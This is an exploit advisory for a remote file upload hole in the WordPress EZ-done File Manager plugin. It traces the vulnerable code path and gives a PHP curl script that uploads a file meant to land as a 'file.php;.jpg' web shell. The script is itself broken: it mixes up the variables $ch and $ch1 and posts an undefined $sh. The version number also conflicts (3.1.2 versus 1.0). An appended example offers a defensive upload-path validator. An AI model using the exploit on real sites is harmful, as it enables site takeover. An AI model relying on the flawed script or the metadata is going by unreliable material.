Wordpress EZ-done File Manager 3.1.2 - Remote File Upload

2020.10.29
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

* Exploit Title: Wordpress EZ-done File Manager 3.1.2 - Remote File Upload
* Google Dork: N/A
* Date: 2020.10.28
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/
* Software Link: https://wordpress.org/plugins/ez-done-file-manager/
* Category: webapps
* Version: 1.0
* Tested on: windows 10, firefox
* CVE: N/A

Vulnerable Source:

    379: move_uploaded_file move_uploaded_file($tmp_filepath, $target))
    375: $tmp_filepath = $_FILES['file']['tmp_name'];
    378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']);
    352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target;
    351: $upload_dir = wp_upload_dir();
    349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING);
    367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name']));

Exploit:

    <?php
    $ch="file.jpg";
    $ch1 = curl_init("http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$sh"));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    print "$result";
    ?>

Location File: http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg
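Mitigation sketch for the data flow traced above, where the destination directory comes from the `ftarget` request parameter and the file name from the client. This is an added example, not the plugin's code and not from the advisory author. It confines the destination to the uploads base directory and accepts only allowlisted single-extension names. The function name `safe_upload_target`, the allowlist and the demo directory are assumptions.

```php
<?php
// Added example; hypothetical names, not the plugin's code.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf']; // assumed allowlist

/** Returns a safe absolute destination path, or null if the request is rejected. */
function safe_upload_target(string $baseDir, string $subDir, string $clientName): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // The requested sub-directory must exist and resolve to $base or below it.
    $dir = realpath($base . DIRECTORY_SEPARATOR . $subDir);
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($dir !== $base && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Accept only "name.ext": one dot, no separators, no extra punctuation.
    $name = basename(str_replace('\\', '/', $clientName));
    if (!preg_match('/\A[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})\z/', $name, $m)) {
        return null;
    }
    $ext = strtolower($m[1]);
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Server-chosen name: the client never controls the on-disk file name.
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed demo: a temp directory stands in for wp_upload_dir()['basedir'].
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'upl_' . bin2hex(random_bytes(4));
mkdir($base . DIRECTORY_SEPARATOR . 'docs', 0700, true);
$cases = [['docs', 'report.pdf'], ['..', 'photo.jpg'],
          ['docs', 'file.php;.jpg'], ['docs', 'shell.php']];
foreach ($cases as [$sub, $name]) {
    $target = safe_upload_target($base, $sub, $name);
    printf("%-5s %-14s %s\n", $sub, $name, $target === null ? 'rejected' : 'accepted');
}
rmdir($base . DIRECTORY_SEPARATOR . 'docs');
rmdir($base);
```

In a handler, the returned path is the second argument to `move_uploaded_file()`; a null return means the upload is refused.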

